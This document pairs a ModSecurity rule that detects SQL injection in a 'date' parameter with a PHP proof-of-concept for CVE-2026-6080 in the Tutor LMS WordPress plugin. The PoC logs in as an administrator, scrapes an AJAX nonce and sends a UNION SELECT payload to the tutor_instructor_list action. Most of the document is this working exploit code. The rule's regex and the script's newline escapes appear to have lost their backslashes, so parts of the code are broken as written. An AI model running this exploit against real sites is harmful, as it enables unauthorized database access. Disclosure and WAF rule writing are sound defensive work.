    SecRule ARGS_POST:date "@rx (?i)(?:'s*(?:union|select|insert|update|delete|drop|create|alter|exec|declare|xp_|benchmark|sleep|waitfor)s|(?:select|union)s.*sfroms|b(?:version|user|database|schema)()|b(?:concat|group_concat)s*(|binformation_schemab|bsysdatabasesb|bsysobjectsb)" 
      "t:lowercase,t:urlDecodeUni,t:removeNulls,t:removeWhitespace"

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-6080 - Tutor LMS <= 3.9.8 - Authenticated (Admin+) SQL Injection via 'date' Parameter

<?php
/**
 * Proof of Concept for CVE-2026-6080
 * Requires valid WordPress administrator credentials
 * Targets the vulnerable instructor listing functionality
 */

$target_url = 'https://vulnerable-site.com';
$username = 'admin';
$password = 'password';

// Step 1: Authenticate to WordPress and obtain nonce
function get_wp_nonce($target_url, $username, $password) {
    $login_url = $target_url . '/wp-login.php';
    $admin_url = $target_url . '/wp-admin/';
    
    // Create a cookie jar for session persistence
    $cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_6080');
    
    // Initial request to get login form cookies
    $ch = curl_init($login_url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEJAR => $cookie_file,
        CURLOPT_COOKIEFILE => $cookie_file,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false
    ]);
    $response = curl_exec($ch);
    
    // Extract the login nonce (log) from the form
    preg_match('/name="log" value="([^"]+)"/', $response, $log_match);
    preg_match('/name="pwd" value="([^"]+)"/', $response, $pwd_match);
    
    // Submit login credentials
    $post_fields = [
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $admin_url,
        'testcookie' => '1'
    ];
    
    curl_setopt_array($ch, [
        CURLOPT_URL => $login_url,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($post_fields)
    ]);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Now access admin to get AJAX nonce
    $ch = curl_init($admin_url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_COOKIEJAR => $cookie_file,
        CURLOPT_COOKIEFILE => $cookie_file,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false
    ]);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Extract AJAX nonce from the page
    preg_match('/"ajaxnonce":"([a-f0-9]+)"/', $response, $nonce_match);
    
    unlink($cookie_file);
    
    return $nonce_match[1] ?? null;
}

// Step 2: Exploit the SQL injection via date parameter
function exploit_sql_injection($target_url, $ajax_nonce) {
    $ajax_url = $target_url . '/wp-admin/admin-ajax.php';
    
    // SQL injection payload to extract database version
    // The payload bypasses the CAST() function and appends a UNION query
    $malicious_date = "2024-01-01' UNION SELECT @@version,2,3,4,5,6,7,8,9,10-- ";
    
    $post_fields = [
        'action' => 'tutor_instructor_list',  // This action triggers the vulnerable code
        'date' => $malicious_date,
        'page' => '1',
        'per_page' => '10',
        '_ajax_nonce' => $ajax_nonce
    ];
    
    $ch = curl_init($ajax_url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => http_build_query($post_fields),
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_HTTPHEADER => ['Content-Type: application/x-www-form-urlencoded']
    ]);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return ['code' => $http_code, 'response' => $response];
}

// Execute the exploit
$ajax_nonce = get_wp_nonce($target_url, $username, $password);

if ($ajax_nonce) {
    echo "[+] Obtained AJAX nonce: $ajax_noncen";
    echo "[+] Sending SQL injection payload...n";
    
    $result = exploit_sql_injection($target_url, $ajax_nonce);
    
    echo "[+] HTTP Response Code: " . $result['code'] . "n";
    echo "[+] Response: " . $result['response'] . "n";
    
    // Parse the JSON response to extract injected data
    $data = json_decode($result['response'], true);
    if ($data && isset($data['data']) && isset($data['data']['instructors'])) {
        echo "[+] Extracted database version from first instructor record:n";
        print_r($data['data']['instructors'][0]);
    }
} else {
    echo "[-] Failed to obtain AJAX nonce. Check credentials.n";
}

?>